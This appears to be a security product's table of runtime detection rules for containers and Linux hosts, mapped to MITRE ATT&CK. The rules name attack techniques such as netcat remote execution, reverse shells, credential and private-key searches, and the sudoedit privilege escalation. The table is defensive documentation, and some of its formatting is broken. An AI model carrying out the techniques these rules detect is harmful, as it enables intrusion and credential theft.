The following table lists the rules you can add to a ruleset, including descriptions
of the
attack techniques the rules are designed to prevent, and a link to the MITRE ATT&CK site for
more details.
|
ID
|
Name
|
Details
|
Mitre link
|
|
01
|
Modify shell configuration file
|
Detects attempts to modify shell configuration files.
|
|
|
02
|
Update package repository
|
Detects when package repositories are updated.
|
|
|
03
|
Read SSH information
|
Detects any attempt to read files in SSH directories by non-SSH programs.
|
|
|
04
|
Read sensitive file trusted after startup
|
Detects attempts to read any sensitive file by a trusted program after startup. Trusted
programs might read these files at startup, but not afterwards.
|
|
|
05
|
System user interactive
|
Detects attempts to run interactive commands by a system (non-login) user.
|
|
|
06
|
Terminal shell in container
|
Detects when a shell command or script was used as the entrypoint or execution point
into
a container with an attached terminal.
|
|
|
07
|
System procs network activity
|
Detects network activity performed by system binaries that are not expected to send
or
receive any network traffic.
|
|
|
08
|
Contact EC2 Instance Metadata Service From Container
|
Detects attempts to contact the EC2 Instance Metadata Service from a container.
|
|
|
10
|
Launch Package Management Process in Container
|
Detects when a package management process is run inside container.
|
|
|
11
|
Netcat Remote Code Execution in Container
|
Detects when Netcat commands are run inside a container, which allows remote code
execution.
|
|
|
12
|
Clear Log Activities
|
Detects the modification or removal of critical log files.
|
|
|
13
|
Create Symlink Over Sensitive Files
|
Detects when a symlink is created for a sensitive file.
|
|
|
14
|
Packet socket created in container
|
Detects new packet sockets at the device driver (OSI L2) in a container. Packet sockets
can be used for ARP spoofing and privilege escalation (CVE-2020-14386) by an attacker.
|
|
|
15
|
Redirect STDOUT/STDIN to Network Connection in Container
|
Detects when STDOUT/STDIN is redirected to the network connection in a container,
which
is a potential reverse shell.
|
N/A
|
|
16
|
Linux Kernel Module Injection Detected
|
Detects when a kernel module was injected from a container.
|
|
|
17
|
Sudo Potential Privilege Escalation
|
Detects privilege escalation vulnerabilities affecting sudo (<= 1.9.5p2).
Unprivileged users can elevate the user privileges to root by executing sudo using
the
sudoedit -s or sudoedit -i command with a command-line
argument that ends with a single backslash character. |
|
|
18
|
Launch Remote File Copy Tools in Container
|
Detects when remote file copy tools are launched in a container.
|
|
|
19
|
Specific discover tool executed in container
|
Detects the execution of discovery and hacking tools inside a container.
|
|
|
20
|
Amicontained download detected in container
|
Detects when an amicontained tool is downloaded.
|
|
|
21
|
Disable Security Tools
|
Detects attempts to disable specific security tools.
|
|
|
22
|
Docker or kubertes client executed in container
|
Detects when a docker or kubernetes client tool is executed inside a container.
|
|
|
23
|
Escape attempt detected in privileged container
|
Detects the usage of debugs and mounts in a container.
|
|
|
24
|
HugePages changed in container
|
Detects HugePages modification as part of mining changes done during XMRig usage.
|
|
|
25
|
Detect crypto miners using the Stratum protocol
|
Miners typically specify the mining pool to connect to with a URI that begins with
stratum+tcpand variants. |
|
|
26
|
Schedule Cron Jobs
|
Detects when cron jobs are scheduled.
|
|
|
27
|
Dynamic linker changed
|
Detects changes to a
/etc/ld.so.preloadfile. |
|
|
28
|
DB program spawned process
|
Detects when a DB-related program spawns a new process other than itself. Can indicate
a
successful SQL injection.
|
|
|
29
|
Lateral Movement using SSH
|
Detects SSH execution with
StrictHostKeyCheckingand batch mode. Can indicated a scripted lateral movement attempt. |
|
|
30
|
Detect miner termination in container
|
Detects miner termination in a container, which can indicate a miner terminating a
competing miner.
|
|
|
31
|
Launch Privileged Container
|
Detects the initial process started in a privileged container.
|
|
|
32
|
Delete or rename shell history
|
Detects when a shell history is deleted.
|
|
|
33
|
File attributes changed in container
|
Detects attempts to change attributes on a file in a container.
|
|
|
34
|
Set Setuid or Setgid bit
|
Detects when the setuid or setgid bits are set for an application, which will run
with
the privileges of the owning user or group.
|
|
|
35
|
Dangerous deletion detected in container
|
Detects when a file is deleted during indicator removal.
|
|
|
36
|
Possible IRC communication in container
|
Detects communication based on a known IRC port, such as TCP/6667, or TCP/6697 for
TLS.
|
|
|
37
|
BOtB download detected in container
|
Detects downloads of complex analysis and exploitation tools for containers.
|
|
|
38
|
Peirates tool detected in container
|
Detects downloads of complex analysis and exploitation tools for containers.
|
|
|
39
|
Interpreted procs inbound network activity
|
Detects any inbound network activity performed by any interpreted program, such as
Perl,
Python, and Ruby.
|
|
|
40
|
Interpreted procs outbound network activity
|
Detects any outbound network activity performed by any interpreted program, such as
Perl,
Python, and Ruby.
|
|
|
41
|
Search Private Keys or Passwords
|
Detects grep searches for private keys or passwords, including the find command.
|
|
|
42
|
Unexpected process termination in container
|
Detects attempts to get specific processes and terminate them, which can indicate
miner's
deployment and rival's termination.
|
|
|
47
|
Suspicious log manipulation
|
Detects targeted modification of critical log files.
|
|
|
48
|
Switch Linux namespace
|
Detects the unauthorized usage of setns syscals, which could lead to container
escape.
|
|
|
49
|
Launch Ingress Remote File Copy Tools in Container
|
Detects when ingress remote file copy tools are launched in a container.
|
|
|
50
|
Execution from /dev/shm
|
Detects file execution from the
/dev/shmdirectory, which is a common tactic for threat actors to stash their files. |
|
|
51
|
Find AWS Credentials
|
Detects find or grep commands trying to access AWS credentials.
|
|
|
52
|
PTRACE attached to process
|
Detects attempts to inject code into a process using PTRACE.
|
|
|
53
|
Create Hidden Files or Directories
|
Detects the creation of hidden files and directories.
|
|
|
54
|
Mkdir binary dirs
|
Detects attempts to create a directory below a set of binary directories.
|
|
|
55
|
Modify binary dirs
|
Detects attempts to modify any file below a set of binary directories.
|
|
|
56
|
Polkit Local Privilege Escalation
|
Detects attempts to exploit a privilege escalation vulnerability in Polkit's pkexec.
|
|
|
57
|
Write below rpm database
|
Detects attempts to write to the rpm database by any non-rpm related program.
|
|
|
58
|
Increase Resource Limits via Prlimit Command in Container
|
Detects when the prlimit command sets or reports the limits of system-wide resources.
|
|
|
59
|
A Local User Added in Container
|
Detects the creation of a user account in a container.
|
|
|
60
|
A Local User Deleted in Container
|
Detects the deletion of a user account in a container.
|
|
|
61
|
Write to Selinux Config
|
Detects attempts to write content to the
/etc/selinux/configfile. |
|
|
62
|
Create Scheduled Task Using At
|
Detects when an
atutility is used to perform task scheduling for initial or recurring execution of code. |
|
|
63
|
Create Scheduled Task Using Systemd Timers
|
Detects when Systemd timers are used to perform task scheduling for initial or recurring
execution of code.
|
|
|
64
|
Write to System Control
|
Detects attempts to write content to the
/etc/syscl.conffile. |
|
|
68
|
Python urllib Import Command Execution
|
Detects when the
import urllibor import urllib2command is run in Python or Python 3. |
N/A
|
|
83
|
File Executed from Memory
|
Detects when reflective code is loaded into a process to conceal the execution of
malicious payloads. Reflective loading involves allocating and executing payloads
directly
within the memory of the process.
|
|
|
84
|
Inject File to Process Memory Virtual Space
|
Detects when adversaries inject malicious code into processes using the /proc filesystem
to evade process-based defenses and potentially elevate privileges. Proc memory injection
is a method of executing arbitrary code in the address space of a separate live
process.
|
|
|
89
|
Suspicious Directory Change via ProcFD
|
Detects process attempts to change the working directory using a proc-based file
descriptor, which is a possible CVE-2024-21626 indicator.
|
N/A
|
|
93
|
Grep Search on Shell Configuration File
|
Detects attempts to search a shell configuration file.
|
N/A
|
|
96
|
Vulnerable liblzma loaded into sshd
|
Detects when a vulnerable liblzma, liblzma.so.5.6.0, or liblzma.so.5.6.1 library is
loaded into
|
N/A
|
|
97
|
Iptables Modification
|
Detects when the iptables service is modified using a command execution.
|
N/A
|